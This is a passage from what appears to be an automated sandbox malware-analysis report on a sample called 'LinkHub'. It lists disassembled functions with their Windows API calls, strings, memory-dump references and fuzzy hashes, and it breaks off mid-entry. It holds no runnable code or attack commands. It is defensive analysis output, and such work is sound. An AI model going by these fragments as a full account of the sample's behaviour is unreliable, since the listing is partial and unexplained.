Instruction Fuzzy Hash: DF11B4359041257BDB206B65ED4AEEA77ECDF01711F1100E6F619A7091EFB8DE818B60

Function 00B6F630 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 00B6F641
_wcslen.LIBCMT ref: 00B6F652
_wcslen.LIBCMT ref: 00B6F690
_wcslen.LIBCMT ref: 00B6F6C6
_wcslen.LIBCMT ref: 00B6F6F6
_wcslen.LIBCMT ref: 00B6F706
_wcslen.LIBCMT ref: 00B6F742
_wcslen.LIBCMT ref: 00B6F771

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: _wcslen$LocalTime
String ID:
API String ID: 952045576-0
Opcode ID: 7f79341868a0f47e24299a17202c33dc2cf466de28f85ae28219271dbf684bb0
Instruction ID: bf7facc9f291acbc8309b46fe35a04c548a3b491ce2741cd8d3928e41b10508b
Opcode Fuzzy Hash: 7f79341868a0f47e24299a17202c33dc2cf466de28f85ae28219271dbf684bb0
Instruction Fuzzy Hash: 62419565C11125B5CB11EBB8EC86AEFB7E8EF05310F5084A2E51CE3121FB74D655C3A6

Function 00B1FBC6 Relevance: 12.1, APIs: 8, Instructions: 124COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00B439E2,00000004,00000000,00000000), ref: 00B1FC41
ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00B439E2,00000004,00000000,00000000), ref: 00B5FC15
ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00B439E2,00000004,00000000,00000000), ref: 00B5FC98

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 5c25aae049257852bc355520eb1248f49e2029bc9558d9af84be3b75c9e498f5
Instruction ID: 7f80711100a43ddd5ff1116417fa4e2f8bdad0b0272baeadde3c0410137a5024
Opcode Fuzzy Hash: 5c25aae049257852bc355520eb1248f49e2029bc9558d9af84be3b75c9e498f5
Instruction Fuzzy Hash: 2641063020838A9ACB348B398AD87BABBD1EB47311F9445FDED4747A70C635A8C5E750

Function 00B9379F Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00B937B7
GetDC.USER32(00000000), ref: 00B937BF
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B937CA
ReleaseDC.USER32(00000000,00000000), ref: 00B937D6
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00B93812
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00B93823
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00B96504,?,?,000000FF,00000000,?,000000FF,?), ref: 00B9385E
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00B9387D

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 38c4208f976c83b192f8f506b8410c93cf7645026d782ab9e0bb37d9220013d1
Instruction ID: b15a391443571eaa731e2ccad28b1057ca9c05aa98ebbdec21607cd098c06875
Opcode Fuzzy Hash: 38c4208f976c83b192f8f506b8410c93cf7645026d782ab9e0bb37d9220013d1
Instruction Fuzzy Hash: 6D319C72201214BFEF118F51CD8AFEB3BA9EF4A751F044066FE089B291CAB59C41C7A0

Function 00B85A0B Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON

Download Yara Rule

Strings

Not an Object type, xrefs: 00B85A64
NULL Pointer assignment, xrefs: 00B85A8B, 00B85DE0

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: e9e8a05928c40cf5d874e72073b7573f68d9c4cfeb0fa6c40e2cd7a10964b1c7
Instruction ID: 57c97627757844ed84243656623353b7e59e0ae8204527e4cad792a8c1b5cbb7
Opcode Fuzzy Hash: e9e8a05928c40cf5d874e72073b7573f68d9c4cfeb0fa6c40e2cd7a10964b1c7
Instruction Fuzzy Hash: 3AD19171A0060A9FDF20EF68C885EAEB7F5FF48344F1485A9E915AB2A0D770DD45CB60

Function 00B418A2 Relevance: 10.8, APIs: 7, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00B41B7B,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 00B4194E
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00B41B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00B419D1
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00B41B7B,?,00B41B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00B41A64
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00B41B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00B41A7B

Part of subcall function 00B33B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00B20165,?,?,00B711D9,0000FFFF), ref: 00B33BC5

MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00B41B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00B41AF7
__freea.LIBCMT ref: 00B41B22
__freea.LIBCMT ref: 00B41B2E

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
String ID:
API String ID: 2829977744-0
Opcode ID: 513a41362d50d8171f1587b44d6858016aad8f1bc55fee79f1d3ce47e41ae286
Instruction ID: 0244de3786fdfd06cedad772d6f2475ae7db87d0519e08f5912efcc875665646
Opcode Fuzzy Hash: 513a41362d50d8171f1587b44d6858016aad8f1bc55fee79f1d3ce47e41ae286
Instruction Fuzzy Hash: 3C91C572F00216AADB208F6CCC95AEE7BF5DF09310F180999E815E7140EB34DE81E760

Function 00B84F80 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00B850A5
VariantInit.OLEAUT32(?), ref: 00B851A6
VariantClear.OLEAUT32(?), ref: 00B851B0
VariantClear.OLEAUT32(?), ref: 00B8520D

Strings

Incorrect Object type in FOR..IN loop, xrefs: 00B85189
Null Object assignment in FOR..IN loop, xrefs: 00B85035, 00B85163, 00B8521B

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Variant$ClearInit
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2610073882-625585964
Opcode ID: d425a337d57cf107a634e78864e4983d1a6e96a593db3c5a5dd8cfdd3e1f8932
Instruction ID: 91fa63b4d347f8e222ef60bdc0a23417bb5c1e99245d0050fec6bc92b0e81126
Opcode Fuzzy Hash: d425a337d57cf107a634e78864e4983d1a6e96a593db3c5a5dd8cfdd3e1f8932
Instruction Fuzzy Hash: DB91A171A00619ABDF20EFA5CC88FAEBBF8EF45314F108599F515AB290D7709945CFA0

Function 00B71B46 Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00B71C1B
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00B71C43
SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00B71C67
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00B71C97
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00B71D1E
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00B71D83
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00B71DEF

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: ArraySafe$Data$Access$UnaccessVartype
String ID:
API String ID: 2550207440-0
Opcode ID: 7d89e25abb89405df6ee0c35071490a7aa941fc114751a589eec36416dc7e6fb
Instruction ID: 17c5d7e717ebe9ac0618685c9f8d2a24be5c4666a39403b7b678193e7d35400a
Opcode Fuzzy Hash: 7d89e25abb89405df6ee0c35071490a7aa941fc114751a589eec36416dc7e6fb
Instruction Fuzzy Hash: 2691DF75A002199FDB019FACD885BBEB7F4FF04711F1088A9E969AB291D774E940CB60

Function 00B843A4 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00B843C8
CharUpperBuffW.USER32(?,?), ref: 00B844D7
_wcslen.LIBCMT ref: 00B844E7
VariantClear.OLEAUT32(?), ref: 00B8467C

Part of subcall function 00B7169E: VariantInit.OLEAUT32(00000000), ref: 00B716DE
Part of subcall function 00B7169E: VariantCopy.OLEAUT32(?,?), ref: 00B716E7
Part of subcall function 00B7169E: VariantClear.OLEAUT32(?), ref: 00B716F3

Strings

AUTOIT.ERROR, xrefs: 00B844DD, 00B844E2
Incorrect Parameter format, xrefs: 00B84403, 00B845FE

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4137639002-1221869570
Opcode ID: 86fcadd51f65c885ebe06f2980c38a729e1e8b37c6cf6da2acda00f50eb24d6e
Instruction ID: 126770f4e64fd7c554578aa68a7349e1133d0f3fa7c1342dba27fdb741e4df39
Opcode Fuzzy Hash: 86fcadd51f65c885ebe06f2980c38a729e1e8b37c6cf6da2acda00f50eb24d6e
Instruction Fuzzy Hash: 919147756083029FC710EF28C48096ABBE5FF89714F1489ADF88997361DB31ED46CB92

Function 00B8560A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 00B608FE: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00B60831,80070057,?,?,?,00B60C4E), ref: 00B6091B
Part of subcall function 00B608FE: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00B60831,80070057,?,?), ref: 00B60936
Part of subcall function 00B608FE: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00B60831,80070057,?,?), ref: 00B60944
Part of subcall function 00B608FE: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00B60831,80070057,?), ref: 00B60954

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00B856AE
_wcslen.LIBCMT ref: 00B857B6
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00B8582C
CoTaskMemFree.OLE32(?), ref: 00B85837

Strings

NULL Pointer assignment, xrefs: 00B85880, 00B858AF

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
String ID: NULL Pointer assignment
API String ID: 614568839-2785691316
Opcode ID: 7159ab7317ad586933ba637c275f344e94bb97d5a4335ec9a21db629da69a4f1
Instruction ID: 8476ee1262d66ae5084e6658deeb35d2cc599ead87bf67cab77e1d2eea1ef08e
Opcode Fuzzy Hash: 7159ab7317ad586933ba637c275f344e94bb97d5a4335ec9a21db629da69a4f1
Instruction Fuzzy Hash: 6391F871D00219EBDF21EFA4D881EEEBBB9BF08304F1085AAE515A7291DB745A44CF60

Function 00B92B99 Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00B92C1F
GetMenuItemCount.USER32(00000000), ref: 00B92C51
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00B92C79
_wcslen.LIBCMT ref: 00B92CAF
GetMenuItemID.USER32(?,?), ref: 00B92CE9
GetSubMenu.USER32(?,?), ref: 00B92CF7

Part of subcall function 00B64393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00B643AD
Part of subcall function 00B64393: GetCurrentThreadId.KERNEL32 ref: 00B643B4
Part of subcall function 00B64393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00B62F00), ref: 00B643BB

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00B92D7F

Part of subcall function 00B6F292: Sleep.KERNEL32 ref: 00B6F30A

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
String ID:
API String ID: 4196846111-0
Opcode ID: 8ee7ab3270c81351c5a35cdc6ba5f8feea5208bc5e802a301aaad72c62e8cc74
Instruction ID: b21a9bad62d6c93acb7aa3fc94212e205f44a33e66f7d7e12e14069f610b02ed
Opcode Fuzzy Hash: 8ee7ab3270c81351c5a35cdc6ba5f8feea5208bc5e802a301aaad72c62e8cc74
Instruction Fuzzy Hash: 7D716D75E00215AFCF10EF65D885AAEBBF5EF48310F1584A9E816AB351DB34EE41CB90

Function 00B988F9 Relevance: 10.7, APIs: 7, Instructions: 193windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00B98992
IsWindowEnabled.USER32(00000000), ref: 00B9899E
SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00B98A79
SendMessageW.USER32(00000000,000000B0,?,?), ref: 00B98AAC
IsDlgButtonChecked.USER32(?,00000000), ref: 00B98AE4
GetWindowLongW.USER32(00000000,000000EC), ref: 00B98B06
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00B98B1E

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: 7fe0430e3c5bf1b9709712096c636871835df62b19c7847dd1f4ac74758a6b84
Instruction ID: c3fd50ebd252045b6a50ee3b1fb47c9b09eda5100a788354e533b19a6e83e3c6
Opcode Fuzzy Hash: 7fe0430e3c5bf1b9709712096c636871835df62b19c7847dd1f4ac74758a6b84
Instruction Fuzzy Hash: DF719F74604204AFDF219F65C894FBEBBF9FF1A300F1414AAE846A7261CB31AD41DB51

Function 00B6B881 Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00B6B8C0
GetKeyboardState.USER32(?), ref: 00B6B8D5
SetKeyboardState.USER32(?), ref: 00B6B936
PostMessageW.USER32(?,00000101,00000010,?), ref: 00B6B964
PostMessageW.USER32(?,00000101,00000011,?), ref: 00B6B983
PostMessageW.USER32(?,00000101,00000012,?), ref: 00B6B9C4
PostMessageW.USER32(?,00000101,0000005B,?), ref: 00B6B9E7

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: c34be2a954a6604b5e2b27e074804dd53750f38e4f98a5fac46ef5234dc1ab87
Instruction ID: 094946d44495b92fd2c92a9042eb2a26a19e229e464d6af21d4a581a529e860c
Opcode Fuzzy Hash: c34be2a954a6604b5e2b27e074804dd53750f38e4f98a5fac46ef5234dc1ab87
Instruction Fuzzy Hash: 1A51DDA16487D53EFB3642348845FBABEF99B06304F0884C9E2D5868D2D7ACACC4DB50

Function 00B6B6A1 Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 00B6B6E0
GetKeyboardState.USER32(?), ref: 00B6B6F5
SetKeyboardState.USER32(?), ref: 00B6B756
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00B6B782
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00B6B79F
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00B6B7DE
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00B6B7FF

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 6ecc580be1d36db9e5ef649c9d9641556b38becc8ff3e5f7f8f98e2af9722177
Instruction ID: a388d123984cbf08fd2d65f1a0757420eb6ff05e06bc09d2b272c678e13ea18e
Opcode Fuzzy Hash: 6ecc580be1d36db9e5ef649c9d9641556b38becc8ff3e5f7f8f98e2af9722177
Instruction Fuzzy Hash: EE51CFA19486D53EFB368224CC55F7ABEF99B46304F0C84C9E0D98B892D798ECC4E750

Function 00B357A1 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,00B35F16,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 00B357E3
__fassign.LIBCMT ref: 00B3585E
__fassign.LIBCMT ref: 00B35879
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 00B3589F
WriteFile.KERNEL32(?,FF8BC35D,00000000,00B35F16,00000000,?,?,?,?,?,?,?,?,?,00B35F16,?), ref: 00B358BE
WriteFile.KERNEL32(?,?,00000001,00B35F16,00000000,?,?,?,?,?,?,?,?,?,00B35F16,?), ref: 00B358F7

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 1bfb0818ecb4874b25a48480e98c87cc4b7eed8c48b5bf60ebd59271eb7385eb
Instruction ID: ad287e41d409204fd8060e77ad669b7f5fc98af2c08f2f26ed329f74ba69200e
Opcode Fuzzy Hash: 1bfb0818ecb4874b25a48480e98c87cc4b7eed8c48b5bf60ebd59271eb7385eb
Instruction Fuzzy Hash: AB51C8B1A00649DFCB20CFA8DC85BEEBBF8EF08310F24455AE955E7291D730A941CB60

Function 00B23090 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00B230BB
___except_validate_context_record.LIBVCRUNTIME ref: 00B230C3
_ValidateLocalCookies.LIBCMT ref: 00B23151
__IsNonwritableInCurrentImage.LIBCMT ref: 00B2317C
_ValidateLocalCookies.LIBCMT ref: 00B231D1

Strings

csm, xrefs: 00B23166

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 5e540368c5e6658b911ef25a7f658e97f610bf96c01ac7aa7524db3ecfddf3e9
Instruction ID: 1350db38112b439fdc409407f7033d2103b66ed244bdb527b27b085dd42e4e58
Opcode Fuzzy Hash: 5e540368c5e6658b911ef25a7f658e97f610bf96c01ac7aa7524db3ecfddf3e9
Instruction Fuzzy Hash: 4341D534A002289BCF10DF68E881BAE7BF5EF44B25F1481D5E8196B392D739DB11CB91

Function 00B81B15 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00B83AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00B83AD7
Part of subcall function 00B83AAB: _wcslen.LIBCMT ref: 00B83AF8

